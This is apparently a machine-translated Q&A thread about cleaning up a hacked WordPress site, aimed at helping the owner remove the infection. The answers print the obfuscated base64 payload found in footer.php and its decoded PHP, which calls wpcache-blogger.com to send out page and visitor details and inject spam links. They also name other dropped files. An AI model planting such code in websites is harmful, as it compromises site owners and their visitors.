2014-12-13 49 views
0

這突然出現了對我的wordpress網站:神祕的突然WordPress的錯誤:wpcache-blogger.com/sape-rolling-sites/config.php

Parse error: syntax error, unexpected ';', expecting ')' in /var/www/admin/data/www/wpcache-blogger.com/sape-rolling-sites/config.php on line 79

我沒有了一會兒&如果編輯什麼我通過FTP查看文件夾,在var/www下沒有名爲「admin」的文件夾。

你們以前見過這樣的事嗎? 我發現了另一個線程,但沒有解決方案,顯然它已經發生給幾個人,但似乎沒有最終答案。

請讓我知道,如果你有這個

+1

如果您發現[另一個問題](http://stackoverflow.com/questions/27458368/unknown-error-occured-in-my-wordpress-site),您應該在那裏添加信息,而不是詢問另一個版本。 – 2014-12-13 13:51:36

+0

下面是一篇文章鏈接,介紹最近與wpcache-blogger相關的黑客攻擊:http://blog.sucuri.net/2014/12/new-malware-campaign-wpcache-blogger-affects-thousands-more-wordpress-websites -via-revslider.html – mltsy 2014-12-26 16:39:47

回答

2

答案是你的根目錄下

進入文件系統並找到footer.php

那麼任何經驗找到模板/頁腳.PHP

,你會看到以下內容:

/* /EVAL(BASE64_DECODE(「ZnVuY3Rpb24gZmlsZ V9nZXRfY29udGVudHNfY3VybCgkdXJsKSB7CiAkY2ggPSBjdXJsX2luaXQoKTsKIGN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9IRUFERVIsIDApOwogY3VybF9zZXRvcHQoJGNoLCBDVVJMT1BUX1JFVFVSTlRSQU5TRkVSLCAxKTsKIGN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9VUkwsICR1cmwpOwogY3VybF9zZXRvcHQoJGNoLCBDVVJMT1BUX1VTRVJBR0VOVCwgIkxPQ0FMU0FQRSIpOwogJGRhdGEgPSBjdXJsX2V4ZWMoJGNoKTsKIGN1cmxfY2xvc2UoJGNoKTsKIHJldHVybiAkZGF0YTsKfQokbGlua3MgPSBmaWxlX2dldF9jb250ZW50c19jdXJsKCJodHRwOi8vd3BjYWNoZS1ibG9nZ2VyLmNvbS9nZXRsaW5rcy5waHA/YXBpY29kZT1sYWxhbGE0NCZwYWdldXJsPSIudXJsZW5jb2RlKCdodHRwOi8vJy4kX1NFUlZFUlsnU0VSVkVSX05BTUUnXS4kX1NFUlZFUlsnUkVRVUVTVF9VUkknXSkuIiZ1c2VyYWdlbnQ9Ii51cmxlbmNvZGUoJF9TRVJWRVJbJ0hUVFBfVVNFUl9BR0VOVCddKS4iIik7CmVjaG8gJGxpbmtzOw ==「));/* />

刪除它........

來自這兩個領域,並保存 - 這將解決這個問題

+0

因此,基本上,@ ahog的網站已被黑客入侵?您可能想提及並指向[FAQ](http://codex.wordpress。org/FAQ_My_site_was_hacked)採取措施防止它被重新入侵... – 2014-12-13 13:56:01

+0

非常感謝你的工作!最近有很多惡意軟件的麻煩,我得到了保護,改變了FTP密碼和一切,但它只是不斷回來......非常感謝你 – ahog 2014-12-13 13:56:56

+0

是的網站已經重寫了腳註 – 2014-12-13 13:58:01

2

這是什麼代碼在做...

function file_get_contents_curl($url) { 
$ch = curl_init(); 
curl_setopt($ch, CURLOPT_HEADER, 0); 
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); 
curl_setopt($ch, CURLOPT_URL, $url); 
curl_setopt($ch, CURLOPT_USERAGENT, "LOCALSAPE"); 
$data = curl_exec($ch); 
curl_close($ch); 
return $data; 
} 
$links = file_get_contents_curl("http://wpcache-blogger.com/getlinks.php?    apicode=lalala44&pageurl=".urlencode('http://'.$_SERVER['SERVER_NAME'].$_SERVER['REQUEST_URI'])."&use ragent=".urlencode($_SERVER['HTTP_USER_AGENT']).""); 
echo $links; 
+0

黑帽攻擊? SAPE? – AlejandroRod 2014-12-13 14:40:58

+0

安裝此插件「限制登錄嘗試」在修復後 – AlejandroRod 2014-12-13 15:15:36

+0

感謝您的提示,我立即做到了!這對解釋很重要 – ahog 2014-12-14 15:49:38

1

它不僅是你頁腳受到感染。 檢查,如果你有下列文件:

footer.php, frommshead.php, options-admin.php, wpinstall - Copy.php 

頁腳是其中加入的iframe(以base64),其餘爲代碼感染它

1

這個技巧都有與革命滑塊插件做。確保首先更新滑塊。然後更改頁腳並刪除文件。 frommshead.php,options-admin.php,wpinstall - copy.php

如果您在服務器上安裝了多個wordpress安裝程序,請檢查它們。